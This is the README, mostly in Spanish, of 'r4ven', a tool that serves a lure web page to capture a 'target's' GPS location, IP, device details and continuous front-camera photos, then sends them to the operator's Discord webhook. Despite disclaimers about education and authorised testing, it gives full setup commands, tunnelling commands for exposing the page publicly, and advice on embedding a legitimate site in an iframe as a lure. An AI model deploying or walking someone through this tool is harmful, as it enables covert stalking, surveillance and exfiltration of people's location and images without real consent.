
Rastree la ubicación GPS del teléfono inteligente o PC del usuario y capture una foto del objetivo, junto con la IP e información del dispositivo.
Este proyecto es una herramienta de investigación y concientización sobre seguridad diseñada para demostrar cómo los navegadores web modernos pueden exponer datos de ubicación, acceso a la cámara, dirección IP e información del dispositivo cuando los usuarios otorgan permisos explícitamente.
La herramienta sirve una página web controlada que incrusta contenido legítimo con fines de demostración. Cuando un usuario permite voluntariamente los permisos del navegador, la aplicación recopila metadatos disponibles como coordenadas GPS, información IP, detalles del dispositivo y entrada de cámara, destacando cómo la ingeniería social y el mal uso de permisos pueden llevar a una exposición no deseada de datos.
Este proyecto está destinado únicamente a educación en seguridad, capacitación en concientización y pruebas autorizadas, ayudando a desarrolladores, testers de penetración y usuarios a comprender mejor los riesgos de los permisos del navegador y mejorar la higiene de la privacidad.
[!IMPORTANT] Prueba de Concepto — Solo para Fines Educativos
Este proyecto demuestra cómo los sitios web maliciosos pueden recopilar datos de ubicación, acceso a la cámara, direcciones IP e información del dispositivo cuando los usuarios otorgan permisos del navegador. Está destinado a crear conciencia sobre los riesgos de privacidad y resaltar por qué los usuarios deben evitar hacer clic en enlaces no confiables o aprobar permisos innecesarios.
[!CAUTION] Solo Uso Ético y Autorizado
Si bien esta herramienta ilustra técnicas reales de atacantes, debe usarse estrictamente para educación, investigación de seguridad y pruebas de penetración autorizadas. Cualquier uso sin el permiso explícito de las partes afectadas está fuertemente desaconsejado.
+ It will automatically fetch the IP address and device information
! If location permission is allowed, it will fetch the exact location of the target.
! If camera permission is allowed, it will capture non-stop from the front camera.
- It will not work on laptops or phones that have no GPS or no Camera,
# browsers that block javascript,
# or if the target is mocking the GPS location.
# or if a target is using VPN or spoofing IP
- Some browsers auto block location and camera permission like(Brave, Safari etc)
+ Location accuracy will be more accurate if you use this on a smartphone.
- Geographic location based on IP address is NOT accurate,
# Does not provide the location of the target.
# Instead, it provides the approximate location of the ISP (Internet service provider)
+ GPS fetch almost exact location because it uses longitude and latitude coordinates.
@@ Once location permission is granted @@
# Accurate location information is received to within 20 to 30 meters of the user's location.
# (it's almost the exact location)
git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py
NOTA: Si no vas a usar localhost
index.html y reemplaza "http://127.0.0.1:8000/image" por la URL que desees usar.O
Por favor usa la bandera -t para elegir una URL diferente.
Usa el siguiente comando para hacer ejecutable r4ven:
chmod +x r4ven.py
python3 r4ven.py [-t target]
python3 r4ven.py [-p port]
python3 r4ven.py [-t target] [-p port]
Ejemplo: python3 r4ven.py -t https://example.com/r4ven/images -p 8000
Enter your discord webhook URL (set up a channel in your discord server with webhook integration)
https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
if not have discord account and sever make one, it's free.
📍 Los datos de seguimiento se enviarán a tu canal de webhook de Discord.
index.html y reemplaza el src en el iframe. (Nota: no todos los sitios web soportan iframe)⭓ Otros comandos para reenviar puertos...
Prueba Cloudflare: cloudflared tunnel --url http://localhost:8000
Tunnelmole: tmole 8000
Ngrok: ngrok http 8000
SSH: ssh -R 80:localhost:8000 ssh.localhost.run
Serveo: ssh -R 80:localhost:8000 serveo.net
- Make sure you port forward else it will not work on the smartphone's browser
Las contribuciones y solicitudes de funciones son bienvenidas. Si encuentras algún problema o tienes ideas para mejorar, no dudes en abrir un issue o enviar un pull request.